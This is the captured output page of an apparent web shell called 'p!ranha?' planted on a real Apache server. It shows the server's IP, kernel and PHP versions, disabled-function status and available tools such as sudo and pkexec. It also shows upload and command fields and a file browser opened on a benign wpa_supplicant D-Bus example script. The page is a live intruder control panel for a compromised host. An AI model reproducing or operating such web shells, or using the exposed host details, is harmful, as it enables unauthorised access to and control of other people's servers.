p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.62
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/wpa_supplicant-2.6/examples/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /usr/share/doc/wpa_supplicant-2.6/examples/wpas-dbus-new-getall.py
#!/usr/bin/python

import dbus
import sys, os
import time
import gobject

def main():
	bus = dbus.SystemBus()
	wpas_obj = bus.get_object("fi.w1.wpa_supplicant1",
				  "/fi/w1/wpa_supplicant1")
	props = wpas_obj.GetAll("fi.w1.wpa_supplicant1",
				dbus_interface=dbus.PROPERTIES_IFACE)
	print "GetAll(fi.w1.wpa_supplicant1, /fi/w1/wpa_supplicant1):"
	print props

	if len(sys.argv) != 2:
		os._exit(1)

	ifname = sys.argv[1]

	wpas = dbus.Interface(wpas_obj, "fi.w1.wpa_supplicant1")
	path = wpas.GetInterface(ifname)
	if_obj = bus.get_object("fi.w1.wpa_supplicant1", path)
	props = if_obj.GetAll("fi.w1.wpa_supplicant1.Interface",
			      dbus_interface=dbus.PROPERTIES_IFACE)
	print
	print "GetAll(fi.w1.wpa_supplicant1.Interface, %s):" % (path)
	print props

	props = if_obj.GetAll("fi.w1.wpa_supplicant1.Interface.WPS",
			      dbus_interface=dbus.PROPERTIES_IFACE)
	print
	print "GetAll(fi.w1.wpa_supplicant1.Interface.WPS, %s):" % (path)
	print props

	res = if_obj.Get("fi.w1.wpa_supplicant1.Interface", 'BSSs',
			 dbus_interface=dbus.PROPERTIES_IFACE)
	if len(res) > 0:
		bss_obj = bus.get_object("fi.w1.wpa_supplicant1", res[0])
		props = bss_obj.GetAll("fi.w1.wpa_supplicant1.BSS",
				       dbus_interface=dbus.PROPERTIES_IFACE)
		print
		print "GetAll(fi.w1.wpa_supplicant1.BSS, %s):" % (res[0])
		print props

	res = if_obj.Get("fi.w1.wpa_supplicant1.Interface", 'Networks',
			 dbus_interface=dbus.PROPERTIES_IFACE)
	if len(res) > 0:
		net_obj = bus.get_object("fi.w1.wpa_supplicant1", res[0])
		props = net_obj.GetAll("fi.w1.wpa_supplicant1.Network",
				       dbus_interface=dbus.PROPERTIES_IFACE)
		print
		print "GetAll(fi.w1.wpa_supplicant1.Network, %s):" % (res[0])
		print props

if __name__ == "__main__":
	main()

N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
December 20 2023 04:53:13
0 / 0
0755
p2p
--
December 20 2023 04:53:13
0 / 0
0755
60_wpa_supplicant
0.261 KB
October 02 2016 18:51:11
0 / 0
0755
dbus-listen-preq.py
1.529 KB
October 02 2016 18:51:11
0 / 0
0644
ieee8021x.conf
0.263 KB
October 02 2016 18:51:11
0 / 0
0644
openCryptoki.conf
1.117 KB
October 02 2016 18:51:11
0 / 0
0644
p2p-action-udhcp.sh
1.683 KB
October 02 2016 18:51:11
0 / 0
0755
p2p-action.sh
2.628 KB
October 02 2016 18:51:11
0 / 0
0755
p2p-nfc.py
19.727 KB
October 02 2016 18:51:11
0 / 0
0644
plaintext.conf
0.13 KB
October 02 2016 18:51:11
0 / 0
0644
udhcpd-p2p.conf
2.861 KB
October 02 2016 18:51:11
0 / 0
0644
wep.conf
0.166 KB
October 02 2016 18:51:11
0 / 0
0644
wpa-psk-tkip.conf
0.177 KB
October 02 2016 18:51:11
0 / 0
0644
wpa2-eap-ccmp.conf
0.277 KB
October 02 2016 18:51:11
0 / 0
0644
wpas-dbus-new-getall.py
1.701 KB
October 02 2016 18:51:11
0 / 0
0644
wpas-dbus-new-signals.py
5.926 KB
October 02 2016 18:51:11
0 / 0
0644
wpas-dbus-new-wps.py
2.169 KB
October 02 2016 18:51:11
0 / 0
0644
wpas-dbus-new.py
4.172 KB
October 02 2016 18:51:11
0 / 0
0644
wpas-test.py
2.511 KB
October 02 2016 18:51:11
0 / 0
0644
wps-ap-cli
1.151 KB
October 02 2016 18:51:11
0 / 0
0755
wps-nfc.py
15.313 KB
October 02 2016 18:51:11
0 / 0
0644